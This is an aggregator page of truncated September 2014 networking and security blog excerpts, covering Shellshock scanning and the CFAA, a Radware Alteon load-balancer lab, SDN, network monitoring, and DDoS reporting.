Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is vaguely written allowing discriminatory prosecution by the powerful, such as when AT&T prosecuted 'weev' for downloading iPad account information that they had made public on their website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it'll give credence to the argument that the law is unconstitutionally vague because I'm obviously not trying to "get away with something".


Law is like code. The code says (paraphrased):
intentionally accesses the computer without authorization thereby obtaining information
There are two vague items here, "intentionally" and "authorization". (The "access" and "information" are also vague, but we'll leave that for later).


The problem with the law is that it was written in the 1980s before the web Continue reading

Change HTTP reply content with AppShape++

Lab goal

When a clients asks for beta/a2.html, return "Hello" instead.

Use VIP 10.136.85.14

Setup


The loadbalancer is Radware's Alteon VA version 29.5.1.0

The initial Alteon VA configuration can be found here.

Notice the group and hosts are preconfigured:

 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/c/slb/real 1
ena
ipver v4
rip 10.136.85.1
/c/slb/real 2
ena
ipver v4
rip 10.136.85.2
/c/slb/real 3
ena
ipver v4
rip 10.136.85.3
/c/slb/group 10
ipver v4
add 1
add 2
add 3

Alteon configuration

First, lets configure the VIP/virt.

Remember routing! The returning traffic needs to go through the Alteon, otherwise TCP will break. So we also need to configure Proxy IP/SNAT so return traffic will go through the Alteon.


1
2
3
4
5
6
7
8
 /c/slb/virt 85_14
ena
vip 10.136.85.14
/c/slb/virt 85_14/service 80 http
group 10
/c/slb/virt 85_14/service 80 http/pip
mode address
addr v4 10.136.85.200

Next we need to write the Appshape++ script:

 1
2
3
4
5
6
7
8
9
10
11
Continue reading

Plexxi Pulse—Preparing for Big Data

Plexxi Pulse—Preparing for Big Data

As enterprises launch Big Data platforms, it is necessary to tailor network infrastructure to support increased activity. Big Data networks must be constructed to handle distributed resources that are simultaneously working on a single task—a functionality that can be taxing on existing infrastructure. Our own Mike Bushong contributed an article to TechRadar Pro this week on this very subject where he outlines the necessary steps to prepare networks for Big Data deployments. He also identifies how software-defined networking can be used as a tool to alleviate bandwidth issues and support application requirements when scaling for Big Data. It’s definitely worth a read before you head out for the weekend.

In this week’s PlexxiTube of the week, Dan Backman explains how Plexxi’s Big Data fabric mitigates incast problems.

Check out what we’ve been up to on social media this September. Enjoy!

The post Plexxi Pulse—Preparing for Big Data appeared first on Plexxi.

Safe from Shellshock: How to protect your home computer from the Bash shell bug

On the surface, the critical “Shellshock” bug revealed this week sounds devastating. By exploiting a bug in the Bash shell command line tool found in Unix-based systems, attackers can run code on your system—essentially giving them access to your system. Bad guys are already developing exploits that use Shellshock to crack your passwords and install DDoS bots on computers. And since Bash shell is borderline ubiquitous, a vast swath of devices are vulnerable to Shellshock: Macs, Linux systems, routers, web servers, “Internet of Things” gizmos, you name it.To read this article in full or to leave a comment, please click here

IPv6 in my streaming media? More likely than you think!

Not that I go out of my way to endorse one project/product over another, there is one that I have recently fallen in love with for streaming my media. Especially when it can use IPv6! So I needed a cross-platform solution for my streaming media needs. I was originally using XBMC, but only had it tied into the TV. I use several other computers and devices, in other locations outside of the house. So I read up on Plex. Got it installed with little to no effort, and could readily access my content where ever I was. I even tested this on my last trip to London, UK and was able to get a decent 1.2mbit/s stream from my house. Only issue was that it wasn’t using IPv6 in the app or accessing via plex.tv (server on that site only comes up with an IPv4 address).

So poking around I discovered 2 things: 1) I could access the Plex server directly at the IP/hostname of the server, and 2) there was a checkbox to enable IPv6!!

plex-ipv6

Simply browse to your Plex server, click on the settings icon (screwdriver + wrench), select Server, click on Networking and then “Show Continue reading

Many eyes theory conclusively disproven

Just because a bug was found in open-source does not disprove the "many eyes" theory. Instead, it's bugs being found now that should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim promoted by open-source advocates that "many eyes makes bugs shallow", the theory that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmers writes 10x more code than they read. The only people where that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From Continue reading

MidoNet for the Overlay, Cumulus Linux for the Underlay. Like Coffee and Cream.

VTEP is not the only way MidoNet customers can use a switch that runs Cumulus Linux as the underlay (physical network) for the virtual, overlay networks.

We’ve announced our partnership to work with Cumulus Networks earlier in 2014 to use Cumulus Linux as a Layer-2 VxLAN Gateway to bridge VLANs in the virtual network world to the VLANs in the physical world.

We’ve shipped that code as part of MidoNet version 1.6.

We now want to talk about how VTEP is not the only way MidoNet customers can use a switch that runs Cumulus Linux as the underlay (physical network) for the virtual, overlay networks.    Just don’t think of running a set of gateway switches as the only way to benefit from these devices, we see many opportunities and benefits.

Here are some examples why it makes sense :

Automation

Remember that Cumulus Linux IS Linux. It’s not a switch OS that just happens to be based on Linux.  It offers cloud automation capabilities that is so crucial to customers who are adopting to move towards building a Cloud. If you listen to Customers, Systems like Chef and Puppet are widely used in the deployment of systems like OpenStack, Continue reading

FCC advised on Remediation of Server-based DDoS Attacks

Yesterday, the Communications Security, Reliability and Interoperability Council (CSRIC), a federal advisory committee to the Federal Communications Commission (FCC), submitted its final report on Remediation of Server-based DDoS Attacks.

The CSRIC’s Working Group 5 was tasked with developing recommendations for communications providers to enable them to mitigate the impact of high volume DDoS attacks launched from large data center and hosting environments.

The final report includes a comprehensive look at the DDoS threat landscape, covering everything from the massive size of today’s attacks, to the potential for collateral damage. The report describes how DDoS attacks are becoming increasingly complex, how they are being used as a diversion “to distract security resources while other attacks are being attempted, e.g., fraudulent transactions.” The report also discusses how botnet architectures are becoming more sophisticated and difficult to trace.

Given this complex and challenging threat landscape, we were grateful for the opportunity to contribute. The CSRIC has adapted Arbor Networks best practices for DDoS incident response as the Six Phases for DDoS Attack Preparation & Response.

Web_SixPhases_Final

Roland Dobbins, senior analyst with Arbor’s Security Engineering & Response Team (ASERT), served as the Internet sub-group chairman of CSRIC IV WG5 – Server-Based Continue reading

PQ Show 33 – Intel Rack Scale Architecture – Real or Impractical ?

At the IDF 2014 conference, Intel made a big song and dance about their Rack Scale Architecture which removes the need for “top of rack” networking and changes the nature of servers in a big way. My initial impression is that this has limited application in the enterprise or cloud providers but might be useful […]

Author information

Greg Ferro

Greg Ferro is a Network Engineer/Architect, mostly focussed on Data Centre, Security Infrastructure, and recently Virtualization. He has over 20 years in IT, in wide range of employers working as a freelance consultant including Finance, Service Providers and Online Companies. He is CCIE#6920 and has a few ideas about the world, but not enough to really count.

He is a host on the Packet Pushers Podcast, blogger at EtherealMind.com and on Twitter @etherealmind and Google Plus.

The post PQ Show 33 – Intel Rack Scale Architecture – Real or Impractical ? appeared first on Packet Pushers Podcast and was written by Greg Ferro.

Three Big SDN Questions for Your SDN Development Plan

SDN is happening. What questions should you be asking about your own development plan to learn SDN skills?

I’ve been thinking about this question in preparation for an upcoming Interop Debate on October 1st, where we’ll be discussing the options to pursue traditional certifications versus learning about SDN. Today’s post begins a series of posts related to topics surrounding that debate. To begin, we’ll look at three big-picture questions you should ask when you get serious about studying about SDN.

Overview

How much of your skill set happened to you, rather than being something you planned? How much of your learning relates to surviving today’s job tasks, versus learning for the future?

Let’s face it, many days, we do the job in front of us, with little time to devote to learning something unrelated. However, that’s a fundamental question for any IT knowledge-based worker. Do you have a development plan? Do you spend time working that plan? And now with SDN happening… how should you revise that plan in light of SDN? In the time you can devote this week/month/year, what should you be learning about SDN?

Some people will wait to learn SDN when the next project Continue reading

Network Taps, Monitoring & Visibility Fabrics: Modern Packet Sniffing

Before we go in to observed trends, let’s put some context on this post and definitions around monitoring. Network monitoring and tapping, this can be described as “packet capture, packet and session analysis and NetFlow generation with analytics”. Tap fabrics typically provide a means of extracting packets from a network but not so much the analysis. Tools like Wireshark, Lancope’s Stealth Watch and a good IDP solution are still required.

Current Situation and Legacy Methodology

In days of past (and most current networks), if you want/ed to harvest packets from a network the quickest route was to mirror a port to a server running Wireshark and filter the results to make sense of what was going on from a protocol and application point of view. Cisco have tools like the NAM, which comes in several forms such as a server, Catalyst 6500 switch module and ISR module. The NAM allows you to visually observe network trends and network conversations via generated graphs but also inspect by download the PCAP files. Probably one of the most pleasant experiences most people have in addition to Wireshark.

Some shortcomings exist with this approach in so much as the device that receives the mirrored Continue reading

Policy versus ACLs, it’s those exposed implementation details again

In a blog week dedicated to the application and the policies that govern them, I wanted to add some detail on a discussion I have with customers quite often. It should be clear that we at Plexxi believe in application policy driven network behaviors. Our Affinities allow you to specify desired behavior between network endpoints, which will evolve with the enormous amount of policy work Mat described in his 3 piece article earlier this week.

ACL

Many times when I discuss Affinities and policies with customers or more generically with network engineering types, the explanation almost always lands at Access Control Lists (ACLs). Cisco created the concept of ACLs (and its many variations used for other policy constructs) way way back as a mechanism to instruct the switching chips inside their routers to accept or drop traffic. It started with a very simple “traffic from this source to this destination is dropped” and has very significantly evolved since then in Cisco’s implementation and many other of the router and switch vendors.

There are 2 basic components in an ACL:

1. what should I match a packet on

2. what is the action I take once I found a match.

Both Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave it's name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, but I hadn't considered that bug before (to my great embarrassment), but of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self evident in the way that Continue reading

Quick Guide to my Interop New York Sessions

I’m running or participating in five workshops or sessions during next week’s Interop New York. Three of them build on each other, so you might want to attend all of them in sequence:

Designing Infrastructure for Private Clouds starts with requirements gathering phase and focuses on physical infrastructure design decisions covering compute, storage, physical and virtual networking, and network services. If you plan to build a private (or a reasonable small public) cloud, start here.

Read more ...

Bash ‘shellshock’ bug is wormable

Early results from my scan: there's about 3000 systems vulnerable just on port 80, just on the root "/" URL, without Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses that than.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webserves on odd ports that are the real danger. Scanning for more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading